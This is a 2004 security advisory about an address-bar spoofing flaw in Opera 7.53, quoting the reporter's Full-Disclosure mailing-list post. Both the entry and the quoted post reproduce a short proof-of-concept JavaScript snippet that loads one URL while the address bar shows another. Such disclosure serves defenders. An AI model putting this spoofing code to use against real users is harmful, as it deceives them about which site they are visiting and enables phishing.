Opera Web Browser Javascript ‘location.replace’ Lets Remote Users Spoof Address Bar

Date: Jul 27 2004
Exploit Included: Yes

Version(s): 7.53, Build 3850
Description: A vulnerability was reported in the Opera web browser in the processing of javascript. A remote user can create HTML that will spoof the URL in the address bar.
bitlance winter reported that a remote user can create HTML containing javascript that, when loaded, will load a URL but cause a different URL to be displayed in the address bar.
A demonstration exploit is provided:

Quote:


[script] function fake() { oc=window.open(‘http://www.opera.com/’, ”,’location=1′); oc.location.replace(‘http://www.example.com’); } [/script] [a href=”javascript:void(0);” onClick=”fake()”]http://www.opera.com/[/a]


[Editor’s note: In our testing with Opera 7.51, the address bar did not display the spoofed URL until another page was browsed and then the ‘back’ button was clicked to return to the spoofed page.]

Impact: A remote user can cause the browser to display an arbitrary URL.
Solution: No solution was available at the time of this entry.
Vendor URL: opera.com/
Underlying OS: Windows (Any)
Reported By: “bitlance winter”
Message History: None.

Date: Mon, 26 Jul 2004 13:02:11 +0000 From: “bitlance winter” Subject: [Full-Disclosure] Opera 7.53 (Build 3850) Address Bar Spoofing Issue
Hello List.
I report you about Opera 7.53 (Build 3850) Address Bar Spoofing Issue, tested on Windows OS.
==== begin of PoC [script] function fake() { oc=window.open(‘http://www.opera.com/’, ”,’location=1′); oc.location.replace(‘http://www.example.com’); [/script] [a href=”javascript:void(0);” onClick=”fake()”]http://www.opera.com/[/a] ==== end of PoC
Best Regards.
— bilance winter

LEAVE A REPLY

Please enter your comment!
Please enter your name here